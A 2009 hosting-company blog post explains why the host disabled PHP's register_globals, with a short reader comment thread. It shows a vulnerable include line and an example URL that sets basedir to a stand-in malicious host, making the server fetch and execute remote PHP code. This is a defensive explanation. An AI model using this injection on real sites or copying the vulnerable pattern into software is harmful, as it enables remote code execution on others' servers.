24 June 2009
REGISTER_GLOBALS = OFF
Posted by Norman under: Guides .
You may aware that we finally decided to disable register_global in PHP by default in all servers, which annoyed some users … and while I was reading this great book I found a good example in how easy to HACK/CRAK PHP website when register_globals is turned ON:
imagine index.php file that contains the following code:
<?php
require_once ($basedir.’/somecode.php’);
// More code that is perfectly safe follows
?>
The code above usually found in %99 of any PHP software, code simply includes legitimate somecode.php PHP file that contains more PHP code and process it.
If register_globals turned ON, the hacker can request your index.php file using an url like this one:
http://www.yourwebsite.com/index.php?basedir=http://www.nastysite.com
The result is that our vulnerable code will load, and execute code in http://www.nastysite.com/somecode.php. That means that the cracker is able to load, and execute his own somecode.php, which is arbitrary PHP code, intended to hack your site.
I hope this explains why we disabled register_globals in all servers.
4 Comments so far...
Robert Says:
25 June 2009 at 5:38 am.
We need an alternative code in order to stay operational.
Suggestions?
Robert
admin Says:
25 June 2009 at 5:50 am.
we are not programmers, you can put local php.ini file to enable register_globals in your account (contact support for details), but you have high risk to be hacked and in that case we will not able to help you.
Andy Says:
21 July 2009 at 11:50 pm.
As the register_globals issue is quite controversial, the PHP community has decided to remove this feature from PHP 6.0.0. So, if you’re relying on the register_globals in your project, it’s time to update your code.
See: http://us3.php.net/manual/en/ini.core.php#ini.register-globals
admin Says:
22 July 2009 at 1:20 am.
and register_globals is disabled by default in PHP 5